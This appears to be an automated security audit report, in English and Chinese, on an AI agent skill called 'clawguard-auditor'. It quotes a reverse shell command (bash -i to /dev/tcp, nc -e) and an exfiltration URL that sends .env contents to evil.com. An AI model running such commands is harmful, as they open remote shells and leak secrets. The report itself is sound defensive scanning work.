clawguard-auditor
Security auditor skill contains embedded reverse shell patterns (nc -e, bash -i >& /dev/tcp) and data exfiltration examples (evil.com/?data=$(cat .env)) within documentation. No executable code files present, but the skill specification describes extensive capabilities (filesystem:WRITE, network:READ, shell:ADMIN) without implementation.
为什么得出这个结论
2/4 个维度触发声明资源与推断能力基本一致。
提取到 2 个高危 IOC 或外联信号。
报告包含 4 步攻击链,另有 1 项高危或严重发现。
没有完整依赖信息,供应链判断需要保留弹性。
攻击链
初始入口 · SKILL.md:1
weaponization · SKILL.md:55
exploitation · SKILL.md:55
最终危害 · SKILL.md:55
风险分是怎么被拉高的
SKILL.md:55 contains 'nc -e' and 'bash -i >& /dev/tcp' strings embedded in documentation
SKILL.md:99 contains 'http://evil.com/?data=$(cat .env)' as detection example
Skill describes extensive capabilities (WRITE, ADMIN, NET_EGRESS) for documentation-only implementation
Absence of scripts/ directory, requirements.txt, or any code files reduces practical risk
Patterns appear in 'SAST Red Flag Hunt' section as detection examples
All files are Markdown/JSON with no executable code present
最关键的证据
Embedded reverse shell command patterns
SKILL.md contains literal strings 'nc -e' and 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' at line 55 within a list of 'red flags to detect'. While in context these are examples, they represent dangerous patterns that could be extracted by prompt injection or interpreted by a compromised AI agent.
SKILL.md:55 Data exfiltration pattern example
SKILL.md contains 'http://evil.com/?data=$(cat .env)' as an example of what the DLP engine should block. This embeds a real exfiltration technique as instructional content.
SKILL.md:99 Capabilities exceed implementation
The skill describes requiring CAP_FS_WRITE, CAP_NET_EGRESS, CAP_SYS_EXEC, and CAP_FS_READ_SENSITIVE capabilities, but no executable code files exist. This creates a mismatch between declared purpose and actual functionality.
SKILL.md:25 Documentation-only implementation
All files are Markdown or JSON with no scripts/, requirements.txt, package.json, or any executable code. The skill is a specification without implementation.
SKILL.md:1 声明能力 vs 实际能力
SKILL.md describes CAP_FS_WRITE capability but no code exists to exercise it SKILL.md describes NET_EGRESS token but no network code present No shell scripts or subprocess calls in any file Mentions credential access but no code implements it 可疑产物与外联
nc -e SKILL.md:55
bash -i >& SKILL.md:55
http://evil.com/?data=$(cat SKILL.md:99
依赖与供应链
没有结构化依赖告警。
文件构成
SKILL.md